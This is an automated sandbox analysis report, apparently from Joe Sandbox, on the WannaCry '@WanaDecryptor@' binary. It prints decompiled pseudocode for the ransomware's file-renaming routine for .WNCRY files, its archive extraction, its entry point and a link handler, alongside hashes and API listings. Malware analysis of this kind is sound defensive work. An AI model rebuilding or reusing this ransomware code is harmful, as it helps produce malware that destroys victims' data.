                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092$#1641Create$#4710BrushFontSolid
                                                      • String ID: Arial
                                                      • API String ID: 1126252797-493054409
                                                      • Opcode ID: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                                      • Instruction ID: f8dd995afa615cab71677879a74d6ff7c2e305333cbfc3da3be905e2a6067967
                                                      • Opcode Fuzzy Hash: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                                      • Instruction Fuzzy Hash: CC21C6B13507107FE625A764DD86FAA2759BBC8B40F10011EB345AB2D1CAF5EC41879C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402560 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 81fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E00402560(intOrPtr __ecx, WCHAR* _a4) {
				short _v720;
				intOrPtr _v724;
				void* _t21;
				void* _t22;
				WCHAR* _t23;
				void* _t30;
				short* _t31;
				intOrPtr* _t32;
				void* _t34;
				void* _t36;

				_t23 = _a4;
				_v724 = __ecx;
				_t30 = 0;
				wcscpy( &_v720, _t23);
				_t31 = wcsrchr( &_v720, 0x2e);
				_t34 =  &_v724 + 0x10;
				if(_t31 == 0) {
					L4:
					wcscat( &_v720, L".org");
				} else {
					_t32 = __imp___wcsicmp;
					_t21 =  *_t32(_t31, L".WNCRY");
					_t36 = _t34 + 8;
					if(_t21 == 0) {
						L3:
						 *_t31 = 0;
						_t30 = 1;
					} else {
						_t22 =  *_t32(_t31, L".WNCYR");
						_t34 = _t36 + 8;
						if(_t22 != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				if(E004020A0(_v724, _t23,  &_v720) == 0) {
					DeleteFileW( &_v720);
					goto L11;
				} else {
					if(DeleteFileW(_t23) == 0) {
						L11:
						return 0;
					} else {
						if(_t30 != 0) {
							return 1;
						} else {
							return MoveFileW( &_v720, _t23);
						}
					}
				}
			}













                                                      0x00402567
                                                      0x00402576
                                                      0x0040257b
                                                      0x0040257d
                                                      0x00402590
                                                      0x00402592
                                                      0x00402597
                                                      0x004025c9
                                                      0x004025d3
                                                      0x00402599
                                                      0x00402599
                                                      0x004025a5
                                                      0x004025a7
                                                      0x004025ac
                                                      0x004025bd
                                                      0x004025bd
                                                      0x004025c2
                                                      0x004025ae
                                                      0x004025b4
                                                      0x004025b6
                                                      0x004025bb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004025bb
                                                      0x004025ac
                                                      0x004025ed
                                                      0x0040262e
                                                      0x00000000
                                                      0x004025ef
                                                      0x004025f8
                                                      0x00402637
                                                      0x00402640
                                                      0x004025fa
                                                      0x004025fc
                                                      0x00402626
                                                      0x004025fe
                                                      0x00402614
                                                      0x00402614
                                                      0x004025fc
                                                      0x004025f8

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete_wcsicmp$Movewcscatwcscpywcsrchr
                                                      • String ID: .WNCRY$.WNCYR$.org
                                                      • API String ID: 1016768320-4283512309
                                                      • Opcode ID: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                                      • Instruction ID: 8e688c7c8c2018b5eb76f9bfe5eaf8fc18d5300b1d9ff01e022ce9e0f1e53e02
                                                      • Opcode Fuzzy Hash: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                                      • Instruction Fuzzy Hash: 29219576240301ABD220DB15FE49BEB7799DBD4711F44483BF901A2280EB7DD90987BE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00412360 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 366COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E00412360(signed int __ecx, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v0;
				char _v260;
				struct _FILETIME _v268;
				struct _FILETIME _v276;
				struct _FILETIME _v284;
				void* _v292;
				void* _v296;
				signed int _v304;
				char _v560;
				struct _OVERLAPPED* _v820;
				void* _v824;
				void* _v827;
				void* _v828;
				long _v829;
				void* _v836;
				intOrPtr _t68;
				long _t77;
				void* _t81;
				void* _t82;
				void* _t90;
				void* _t91;
				long _t94;
				signed int _t97;
				long _t99;
				void* _t106;
				int _t116;
				long _t121;
				signed int _t132;
				signed int _t138;
				unsigned int _t140;
				signed int _t141;
				void* _t154;
				intOrPtr* _t157;
				intOrPtr _t166;
				void* _t174;
				signed int _t175;
				signed int _t176;
				long _t177;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t180;
				void* _t182;
				long _t183;
				intOrPtr* _t185;
				void* _t187;
				void* _t191;
				void* _t192;

				_t166 = _a16;
				_t132 = __ecx;
				if(_t166 == 3) {
					_t68 =  *((intOrPtr*)(__ecx + 4));
					_t176 = _a4;
					__eflags = _t176 - _t68;
					if(_t176 == _t68) {
						L14:
						_t177 = E00411810( *_t132, _a8, _a12,  &_v829);
						__eflags = _t177;
						if(_t177 <= 0) {
							E00411AC0( *_t132);
							 *(_t132 + 4) = 0xffffffff;
						}
						__eflags = _v829;
						if(_v829 == 0) {
							__eflags = _t177;
							if(_t177 <= 0) {
								asm("sbb eax, eax");
								_t77 = 0x1000 + ( ~(_t177 - 0xffffff96) & 0x04fff000);
								__eflags = _t77;
								return _t77;
							} else {
								return 0x600;
							}
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = _t68 - 0xffffffff;
						if(_t68 != 0xffffffff) {
							E00411AC0( *((intOrPtr*)(__ecx)));
							_t187 = _t187 + 4;
						}
						_t81 =  *_t132;
						 *(_t132 + 4) = 0xffffffff;
						__eflags = _t176 -  *((intOrPtr*)(_t81 + 4));
						if(_t176 <  *((intOrPtr*)(_t81 + 4))) {
							__eflags = _t176 -  *((intOrPtr*)(_t81 + 0x10));
							if(_t176 <  *((intOrPtr*)(_t81 + 0x10))) {
								E00411390(_t81);
								_t187 = _t187 + 4;
							}
							_t82 =  *_t132;
							__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							while( *((intOrPtr*)(_t82 + 0x10)) < _t176) {
								E004113E0(_t82);
								_t82 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							}
							_push( *((intOrPtr*)(_t132 + 0x138)));
							_push( *_t132);
							E00411660();
							_t187 = _t187 + 8;
							 *(_t132 + 4) = _t176;
							goto L14;
						} else {
							return 0x10000;
						}
					}
				} else {
					if(_t166 == 2 || _t166 == 1) {
						_t178 = _t175 | 0xffffffff;
						__eflags =  *(_t132 + 4) - _t178;
						if( *(_t132 + 4) != _t178) {
							E00411AC0( *_t132);
							_t187 = _t187 + 4;
						}
						_t90 =  *_t132;
						 *(_t132 + 4) = _t178;
						_t179 = _a4;
						__eflags = _t179 -  *((intOrPtr*)(_t90 + 4));
						if(_t179 <  *((intOrPtr*)(_t90 + 4))) {
							__eflags = _t179 -  *((intOrPtr*)(_t90 + 0x10));
							if(_t179 <  *((intOrPtr*)(_t90 + 0x10))) {
								E00411390(_t90);
								_t187 = _t187 + 4;
							}
							_t91 =  *_t132;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							while( *((intOrPtr*)(_t91 + 0x10)) < _t179) {
								E004113E0(_t91);
								_t91 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							}
							_t138 = _t132;
							E00411CF0(_t138, _t179,  &_v560);
							__eflags = _v304 & 0x00000010;
							if((_v304 & 0x00000010) == 0) {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t157 = _a8;
									_t185 = _t157;
									_t180 = _t157;
									_t94 =  *_t157;
									__eflags = _t94;
									while(_t94 != 0) {
										__eflags = _t94 - 0x2f;
										if(_t94 == 0x2f) {
											L43:
											_t185 = _t180 + 1;
										} else {
											__eflags = _t94 - 0x5c;
											if(_t94 == 0x5c) {
												goto L43;
											}
										}
										_t94 =  *((intOrPtr*)(_t180 + 1));
										_t180 = _t180 + 1;
										__eflags = _t94;
									}
									asm("repne scasb");
									_t140 =  !(_t138 | 0xffffffff);
									_v828 =  &_v820;
									_t182 = _t157 - _t140;
									_t141 = _t140 >> 2;
									_t97 = memcpy(_v828, _t182, _t141 << 2);
									__eflags = _t185 - _t157;
									memcpy(_t182 + _t141 + _t141, _t182, _t97 & 0x00000003);
									_t191 = _t187 + 0x18;
									if(__eflags != 0) {
										 *((char*)(_t191 + _t185 - _t157 + 0x1c)) = 0;
										_t99 = _v820;
										__eflags = _t99 - 0x2f;
										if(_t99 == 0x2f) {
											L55:
											wsprintfA( &_v260, "%s%s",  &_v820, _t185);
											E00412250(0, _t191 + 0x2c);
											_t187 = _t191 + 0x18;
											goto L48;
										} else {
											__eflags = _t99 - 0x5c;
											if(_t99 == 0x5c) {
												goto L55;
											} else {
												__eflags = _t99;
												if(_t99 == 0) {
													goto L47;
												} else {
													__eflags =  *((char*)(_t191 + 0x1d)) - 0x3a;
													if( *((char*)(_t191 + 0x1d)) != 0x3a) {
														goto L47;
													} else {
														goto L55;
													}
												}
											}
										}
										goto L73;
									} else {
										_v820 = 0;
										L47:
										wsprintfA( &_v260, "%s%s%s", _t132 + 0x140,  &_v820, _t185);
										E00412250(_t132 + 0x140, _t191 + 0x30);
										_t187 = _t191 + 0x1c;
									}
									L48:
									_t174 = CreateFileA(_t187 + 0x260, 0x40000000, 0, 0, 2,  *(_t187 + 0x228), 0);
								} else {
									_t174 = _a8;
								}
								__eflags = _t174 - 0xffffffff;
								if(_t174 != 0xffffffff) {
									_push( *((intOrPtr*)(_t132 + 0x138)));
									_push( *_t132);
									E00411660();
									_t106 =  *(_t132 + 0x13c);
									_t192 = _t187 + 8;
									__eflags = _t106;
									if(_t106 == 0) {
										_push(0x4000);
										L00412CEC();
										_t192 = _t192 + 4;
										 *(_t132 + 0x13c) = _t106;
									}
									_v820 = 0;
									while(1) {
										_t183 = E00411810( *_t132,  *(_t132 + 0x13c), 0x4000, _t192 + 0x13);
										_t192 = _t192 + 0x10;
										__eflags = _t183 - 0xffffff96;
										if(_t183 == 0xffffff96) {
											break;
										}
										__eflags = _t183;
										if(__eflags < 0) {
											L68:
											_v820 = 0x5000000;
										} else {
											if(__eflags <= 0) {
												L63:
												__eflags =  *(_t192 + 0x13);
												if( *(_t192 + 0x13) != 0) {
													SetFileTime(_t174,  &_v276,  &_v284,  &_v268);
												} else {
													__eflags = _t183;
													if(_t183 == 0) {
														goto L68;
													} else {
														continue;
													}
												}
											} else {
												_t116 = WriteFile(_t174,  *(_t132 + 0x13c), _t183, _t192 + 0x18, 0);
												__eflags = _t116;
												if(_t116 == 0) {
													_v820 = 0x400;
												} else {
													goto L63;
												}
											}
										}
										L70:
										__eflags =  *((intOrPtr*)(_t192 + 0x360)) - 1;
										if( *((intOrPtr*)(_t192 + 0x360)) != 1) {
											CloseHandle(_t174);
										}
										E00411AC0( *_t132);
										return _v820;
										goto L73;
									}
									_v820 = 0x1000;
									goto L70;
								} else {
									return 0x200;
								}
							} else {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t154 = _a8;
									_t121 =  *_t154;
									__eflags = _t121 - 0x2f;
									if(_t121 == 0x2f) {
										L36:
										E00412250(0, _t154);
										__eflags = 0;
										return 0;
									} else {
										__eflags = _t121 - 0x5c;
										if(_t121 == 0x5c) {
											goto L36;
										} else {
											__eflags = _t121;
											if(_t121 == 0) {
												L37:
												E00412250(_t132 + 0x140, _t154);
												__eflags = 0;
												return 0;
											} else {
												__eflags =  *((char*)(_t154 + 1)) - 0x3a;
												if( *((char*)(_t154 + 1)) != 0x3a) {
													goto L37;
												} else {
													goto L36;
												}
											}
										}
									}
								} else {
									__eflags = 0;
									return 0;
								}
							}
						} else {
							return 0x10000;
						}
					} else {
						return 0x10000;
					}
				}
				L73:
			}


















































                                                      0x0041236a
                                                      0x00412371
                                                      0x00412376
                                                      0x0041239c
                                                      0x0041239f
                                                      0x004123a6
                                                      0x004123a8
                                                      0x00412414
                                                      0x00412431
                                                      0x00412436
                                                      0x00412438
                                                      0x0041243d
                                                      0x00412445
                                                      0x00412445
                                                      0x00412450
                                                      0x00412452
                                                      0x00412463
                                                      0x00412465
                                                      0x00412482
                                                      0x0041248b
                                                      0x0041248b
                                                      0x00412496
                                                      0x0041246a
                                                      0x00412476
                                                      0x00412476
                                                      0x00412457
                                                      0x00412457
                                                      0x00412460
                                                      0x00412460
                                                      0x004123aa
                                                      0x004123aa
                                                      0x004123ad
                                                      0x004123b2
                                                      0x004123b7
                                                      0x004123b7
                                                      0x004123ba
                                                      0x004123bc
                                                      0x004123c3
                                                      0x004123c6
                                                      0x004123da
                                                      0x004123dd
                                                      0x004123e0
                                                      0x004123e5
                                                      0x004123e5
                                                      0x004123e8
                                                      0x004123ea
                                                      0x004123ed
                                                      0x004123f0
                                                      0x004123f5
                                                      0x004123f7
                                                      0x004123fa
                                                      0x004123fa
                                                      0x00412407
                                                      0x00412408
                                                      0x00412409
                                                      0x0041240e
                                                      0x00412411
                                                      0x00000000
                                                      0x004123cb
                                                      0x004123d7
                                                      0x004123d7
                                                      0x004123c6
                                                      0x00412378
                                                      0x0041237b
                                                      0x0041249c
                                                      0x0041249f
                                                      0x004124a1
                                                      0x004124a6
                                                      0x004124ab
                                                      0x004124ab
                                                      0x004124ae
                                                      0x004124b0
                                                      0x004124b3
                                                      0x004124ba
                                                      0x004124bd
                                                      0x004124d1
                                                      0x004124d4
                                                      0x004124d7
                                                      0x004124dc
                                                      0x004124dc
                                                      0x004124df
                                                      0x004124e1
                                                      0x004124e4
                                                      0x004124e7
                                                      0x004124ec
                                                      0x004124ee
                                                      0x004124f1
                                                      0x004124f1
                                                      0x004124fd
                                                      0x00412501
                                                      0x00412506
                                                      0x0041250e
                                                      0x00412578
                                                      0x0041257b
                                                      0x00412589
                                                      0x00412590
                                                      0x00412592
                                                      0x00412594
                                                      0x00412596
                                                      0x00412598
                                                      0x0041259a
                                                      0x0041259c
                                                      0x004125a2
                                                      0x004125a2
                                                      0x0041259e
                                                      0x0041259e
                                                      0x004125a0
                                                      0x00000000
                                                      0x00000000
                                                      0x004125a0
                                                      0x004125a5
                                                      0x004125a8
                                                      0x004125a9
                                                      0x004125a9
                                                      0x004125b8
                                                      0x004125ba
                                                      0x004125be
                                                      0x004125c4
                                                      0x004125ca
                                                      0x004125cd
                                                      0x004125d4
                                                      0x004125d6
                                                      0x004125d6
                                                      0x004125d8
                                                      0x0041264d
                                                      0x00412652
                                                      0x00412656
                                                      0x00412658
                                                      0x00412671
                                                      0x00412684
                                                      0x00412691
                                                      0x00412696
                                                      0x00000000
                                                      0x0041265a
                                                      0x0041265a
                                                      0x0041265c
                                                      0x00000000
                                                      0x0041265e
                                                      0x0041265e
                                                      0x00412660
                                                      0x00000000
                                                      0x00412666
                                                      0x00412666
                                                      0x0041266b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041266b
                                                      0x00412660
                                                      0x0041265c
                                                      0x00000000
                                                      0x004125da
                                                      0x004125da
                                                      0x004125df
                                                      0x004125f9
                                                      0x00412605
                                                      0x0041260a
                                                      0x0041260a
                                                      0x0041260d
                                                      0x00412630
                                                      0x0041257d
                                                      0x0041257d
                                                      0x0041257d
                                                      0x00412632
                                                      0x00412635
                                                      0x004126a6
                                                      0x004126a7
                                                      0x004126a8
                                                      0x004126ad
                                                      0x004126b3
                                                      0x004126b6
                                                      0x004126b8
                                                      0x004126ba
                                                      0x004126bf
                                                      0x004126c4
                                                      0x004126c7
                                                      0x004126c7
                                                      0x004126d3
                                                      0x004126db
                                                      0x004126f4
                                                      0x004126f6
                                                      0x004126f9
                                                      0x004126fc
                                                      0x00000000
                                                      0x00000000
                                                      0x004126fe
                                                      0x00412700
                                                      0x0041273c
                                                      0x0041273c
                                                      0x00412702
                                                      0x00412702
                                                      0x0041271a
                                                      0x0041271e
                                                      0x00412720
                                                      0x0041275f
                                                      0x00412722
                                                      0x00412722
                                                      0x00412724
                                                      0x00000000
                                                      0x00412726
                                                      0x00000000
                                                      0x00412726
                                                      0x00412724
                                                      0x00412704
                                                      0x00412714
                                                      0x00412716
                                                      0x00412718
                                                      0x00412732
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00412718
                                                      0x00412702
                                                      0x00412765
                                                      0x00412765
                                                      0x0041276d
                                                      0x00412770
                                                      0x00412770
                                                      0x00412779
                                                      0x0041278f
                                                      0x00000000
                                                      0x0041278f
                                                      0x00412728
                                                      0x00000000
                                                      0x0041263a
                                                      0x00412646
                                                      0x00412646
                                                      0x00412510
                                                      0x00412510
                                                      0x00412513
                                                      0x00412524
                                                      0x0041252b
                                                      0x0041252d
                                                      0x0041252f
                                                      0x0041253f
                                                      0x00412542
                                                      0x0041254a
                                                      0x00412556
                                                      0x00412531
                                                      0x00412531
                                                      0x00412533
                                                      0x00000000
                                                      0x00412535
                                                      0x00412535
                                                      0x00412537
                                                      0x00412559
                                                      0x00412561
                                                      0x00412569
                                                      0x00412575
                                                      0x00412539
                                                      0x00412539
                                                      0x0041253d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041253d
                                                      0x00412537
                                                      0x00412533
                                                      0x00412518
                                                      0x00412518
                                                      0x00412521
                                                      0x00412521
                                                      0x00412513
                                                      0x004124c2
                                                      0x004124ce
                                                      0x004124ce
                                                      0x0041238d
                                                      0x00412399
                                                      0x00412399
                                                      0x0041237b
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s%s$%s%s%s$:
                                                      • API String ID: 0-3034790606
                                                      • Opcode ID: 3f912c73aaf125ccd319ec4db5002a1de97c0c32fb0a3ff325c86f975f1c75c1
                                                      • Instruction ID: ec0a86814d75b7591ef383b01d603f7b60d36dbaf36e5cde56c141efaaef7cbf
                                                      • Opcode Fuzzy Hash: 3f912c73aaf125ccd319ec4db5002a1de97c0c32fb0a3ff325c86f975f1c75c1
                                                      • Instruction Fuzzy Hash: 67C138726002045BDB20DF18ED81BEB7398EB85314F04456BFD54CB385D2BDE99A87AA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00413102 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x41baa8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x422298 =  *0x422298 | 0xffffffff;
				 *0x42229c =  *0x42229c | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x42228c; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x422288; // 0x0
				 *_t24 = _t47;
				 *0x422294 = _adjust_fdiv;
				_t27 = E004133C7( *_adjust_fdiv);
				_t61 =  *0x421790; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E004133C4);
				}
				E004133B2(_t27);
				_push(0x41f018);
				_push(0x41f014);
				L004133AC();
				_t29 =  *0x422284; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x422280,  &_v112);
				_push(0x41f010);
				_push(0x41f000);
				L004133AC();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E004133E6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L004133A6();
				return _t41;
			}





























                                                      0x00413105
                                                      0x00413107
                                                      0x0041310c
                                                      0x00413117
                                                      0x00413118
                                                      0x00413125
                                                      0x0041312a
                                                      0x0041312f
                                                      0x00413136
                                                      0x0041313d
                                                      0x00413144
                                                      0x0041314a
                                                      0x00413150
                                                      0x00413152
                                                      0x00413158
                                                      0x0041315e
                                                      0x00413167
                                                      0x0041316c
                                                      0x00413171
                                                      0x00413177
                                                      0x0041317e
                                                      0x00413184
                                                      0x00413185
                                                      0x0041318a
                                                      0x0041318f
                                                      0x00413194
                                                      0x00413199
                                                      0x0041319e
                                                      0x004131b7
                                                      0x004131bd
                                                      0x004131c2
                                                      0x004131c7
                                                      0x004131d4
                                                      0x004131d6
                                                      0x004131dc
                                                      0x00413218
                                                      0x0041321d
                                                      0x0041321e
                                                      0x0041321e
                                                      0x004131de
                                                      0x004131de
                                                      0x004131de
                                                      0x004131df
                                                      0x004131e2
                                                      0x004131e4
                                                      0x004131ef
                                                      0x004131f1
                                                      0x004131f1
                                                      0x004131f2
                                                      0x004131f2
                                                      0x004131ef
                                                      0x004131f5
                                                      0x004131f9
                                                      0x00000000
                                                      0x00000000
                                                      0x004131ff
                                                      0x00413206
                                                      0x00413210
                                                      0x00413225
                                                      0x00413212
                                                      0x00413212
                                                      0x00413212
                                                      0x00413231
                                                      0x00413236
                                                      0x0041323a
                                                      0x00413240
                                                      0x00413245
                                                      0x00413247
                                                      0x0041324a
                                                      0x0041324b
                                                      0x0041324c
                                                      0x00413253

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                      • String ID:
                                                      • API String ID: 801014965-0
                                                      • Opcode ID: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                                      • Instruction ID: fcecf6e401754473f6225594f41014142e7d5ca2867d00c097f2044c16acc313
                                                      • Opcode Fuzzy Hash: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                                      • Instruction Fuzzy Hash: F9419F71940308EFCB20DFA4DC45AE97BB9EB09711B20016FF855972A1D7788A81CB6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404280 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 51windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E00404280(void* __ecx, char _a8) {
				void* _t9;
				struct HWND__* _t10;
				long _t12;
				long* _t22;
				void* _t24;

				_t24 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
					E00404530(__ecx);
				}
				_t9 = E004045E0(_t24,  &_a8);
				if(_t9 == 0) {
					L6:
					L00412CBC();
					return _t9;
				} else {
					_t22 = _t24 + 0x44;
					_push(0);
					_push("mailto:");
					L00412DB2();
					if(_t9 != 0) {
						_t9 = ShellExecuteA(0, "open",  *_t22, 0, 0, 1);
						goto L6;
					} else {
						_t10 = GetParent( *(_t24 + 0x20));
						_push(_t10);
						L00412DAC();
						_t12 = SendMessageA( *(_t10 + 0x20), 0x1388,  *(_t24 + 0x20),  *_t22);
						L00412CBC();
						return _t12;
					}
				}
			}








                                                      0x00404281
                                                      0x00404289
                                                      0x0040428b
                                                      0x0040428b
                                                      0x00404297
                                                      0x0040429e
                                                      0x004042fd
                                                      0x004042ff
                                                      0x00404306
                                                      0x004042a0
                                                      0x004042a0
                                                      0x004042a3
                                                      0x004042a5
                                                      0x004042ac
                                                      0x004042b3
                                                      0x004042f7
                                                      0x00000000
                                                      0x004042b5
                                                      0x004042bb
                                                      0x004042c1
                                                      0x004042c2
                                                      0x004042d5
                                                      0x004042dd
                                                      0x004042e4
                                                      0x004042e4
                                                      0x004042b3

                                                      APIs
                                                      • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
                                                      • GetParent.USER32(?), ref: 004042BB
                                                      • #2864.MFC42(00000000), ref: 004042C2
                                                      • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
                                                      • #2379.MFC42 ref: 004042DD
                                                        • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
                                                        • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                                        • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                                        • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                                        • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
                                                      • #2379.MFC42(?), ref: 004042FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379#5789$#2864#289#613#6663ExecuteExtentMessageParentPoint32SendShellText
                                                      • String ID: mailto:$open
